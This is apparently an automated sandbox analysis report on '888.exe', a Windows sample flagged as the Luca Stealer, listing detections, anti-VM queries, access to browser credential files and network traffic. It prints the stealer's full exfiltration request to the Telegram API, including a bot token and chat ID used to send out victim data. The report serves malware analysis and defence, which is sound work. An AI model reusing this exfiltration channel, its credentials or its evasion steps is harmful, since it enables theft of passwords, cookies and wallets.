
Windows Analysis Report
888.exe

Overview

General Information

Sample name: 888.exe
Analysis ID: 1574586
MD5: b6e5859c20c608bf7e23a9b4f8b3b699
SHA1: 302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256: bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
Tags: exe, user-lontze7

Detection

Luca Stealer
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 888.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\888.exe" MD5: B6E5859C20C608BF7E23A9B4F8B3B699)
    • powershell.exe (PID: 7056 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author
888.exe | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
0.0.888.exe.f90000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
0.2.888.exe.f90000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\888.exe", ParentImage: C:\Users\user\Desktop\888.exe, ParentProcessId: 5752, ParentProcessName: 888.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 7056, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: 888.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability
Source: 888.exe | Joe Sandbox ML: detected
Source: 888.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: 888.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGUZEPW%20(1280,%201024)%0AHWID:%208671303959770644%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1 | content-type: multipart/form-data; boundary=e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378 | content-length: 888104 | accept: */* | host: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1 | accept: */* | host: ipwho.is
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 108.181.61.49
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGUZEPW%20(1280,%201024)%0AHWID:%208671303959770644%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1 | content-type: multipart/form-data; boundary=e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378 | content-length: 888104 | accept: */* | host: api.telegram.org
Source: 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.is/?output=json
Source: 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.is/?output=jsonF
Source: 888.exe, 00000000.00000002.2710785781.00000000005E5000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.is/?output=jsonFx
Source: 888.exe | String found in binary or memory: http://ns.adobe.
Source: 888.exe | String found in binary or memory: http://www.w3.or
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 888.exe, 00000000.00000002.2711121286.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2710271153.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 888.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: 888.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support0
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 888.exe, 00000000.00000003.2575785656.00000000009CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: C:\Users\user\Desktop\888.exe | Code function: 0_3_009A4CB1
Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_011A6F30
Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_00FB1340
Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_011BEB20
Source: 888.exe | Binary string: }Failed to open \Device\Afd\Mio:
Source: 888.exe | Binary string: N\Device\Afd\Mio
Source: 888.exe | Binary string: Failed to open \Device\Afd\Mio:
Source: classification engine | Classification label: mal84.troj.spyw.evad.winEXE@4/15@2/2
Source: C:\Users\user\Desktop\888.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Users\user\Desktop\888.exe | File created: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\
Source: 888.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\888.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\888.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 888.exe, 00000000.00000003.2574734106.0000000000998000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2577856952.000000000099E000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2575114257.0000000000999000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 888.exe, 00000000.00000000.2075823579.0000000001339000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: unknown | Process created: C:\Users\user\Desktop\888.exe "C:\Users\user\Desktop\888.exe"
Source: C:\Users\user\Desktop\888.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\888.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Users\user\Desktop\888.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: cryptnet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\888.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 888.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 888.exe | Static file information: File size 4885504 > 1048576
Source: 888.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x358200
Source: 888.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x130200
Source: 888.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\888.exe | Code function: 0_3_009A1F2A push eax; ret 0_3_009A1F49

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\888.exe | File deleted: c:\users\user\desktop\888.exe
Source: C:\Users\user\Desktop\888.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2137
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1149
Source: C:\Users\user\Desktop\888.exe API coverage: 8.7 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444 Thread sleep count: 2137 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444 Thread sleep count: 1149 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\888.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\888.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\
Source: CreditCardData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: CreditCardData.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: CreditCardData.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: CreditCardData.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: CreditCardData.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: CreditCardData.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: CreditCardData.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: CreditCardData.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: CreditCardData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: CreditCardData.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: CreditCardData.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: CreditCardData.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: CreditCardData.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: CreditCardData.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: CreditCardData.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 888.exe, 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: CreditCardData.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: CreditCardData.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: CreditCardData.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\888.exe Code function: 0_2_00FB1220 RtlAllocateHeap,GetProcessHeap,HeapAlloc, 0_2_00FB1220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\888.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\888.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
